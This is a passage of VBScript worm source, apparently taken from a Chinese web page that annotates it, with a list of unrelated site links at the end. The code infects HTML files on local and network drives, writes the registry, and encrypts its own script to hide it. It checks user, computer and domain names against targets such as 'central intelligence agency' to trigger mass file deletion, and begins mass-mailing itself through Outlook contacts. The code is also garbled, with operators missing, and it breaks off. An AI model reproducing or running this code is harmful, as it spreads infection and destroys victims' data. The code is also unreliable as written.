set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x"\")
end if
next
if TestUser then Killhe
end sub
sub Gf() '得到系统路径
w1=fso.GetSpecialFolder(0)"\"
w2=fso.GetSpecialFolder(1)"\"
end sub
function Readreg(key_str) '读注册表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) '写注册表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="""HTML""HEAD""TITLE"title(ra)"/""TITLE""/HEAD"_
"BO""AD"vbcrlfMakeScript(Sbuffer, iHTML)vbcrlf_
"""/BOAD""/HTML"
end Function
function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write(''+""'SCRIPT Language=JavaScript\n'+"_
"jword""+'\n/'""+'SCRIPT');"
DocuWrite = DocuWritevbcrlf"document.write(''+""'SCRIPT Language=VBScript\n'+"_
"nword""+'\n/'""+'SCRIPT');"
MakeScript="""SCRIPT Language=JavaScript"vbcrlf"var jword = "_
chr(34)encrypt(Js_Str)chr(34)vbcrlf"var nword = "_
chr(34)Codestrchr(34)vbcrlf"nword = unescape(nword);"vbcrlf_
"jword = unescape(jword);"vbcrlfDocuWritevbcrlf"/""SCRIPT"
else
MakeScript= """SCRIPT Language=JavaScript"Codestr"/""SCRIPT"
end if
end function
function GetScriptCode(Languages) ' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text) 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() '检测用户过程
on error resume next
dim keys(6), i, tmpStr, Wnet
'特定用户关键词
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") '创建网络对象
'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语 , 一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除 。
tmpStr = LCase(Wnet.UserName) '
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function SendMail() '发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件
主题是随机的,此过程与“欢乐时光“类似,所以不再描述
Randomize
at=fso.GetSpecialFolder(1)"\Readme.html"
set Oa = CreateObject("Outlook.Application")
推荐阅读
- 斗鱼直播新浪,斗鱼直播大厅
- 遵义专业sap销售电话,遵义dsp开发招聘
- 列车监控安卓app,列车监控app下载
- pythonc函数库 python 函数库
- 安装.net4.6提示产生阻滞,安装net48产生阻滞问题
- 查看sqlserver数据库的密码,如何查看sql server数据库密码
- 变频空调怎么关闭电脑,变频空调怎么关闭电脑运行
- php查询数组里指定数据 php获取数组键值
- c语言考试周倒计时程序,c语言 倒计时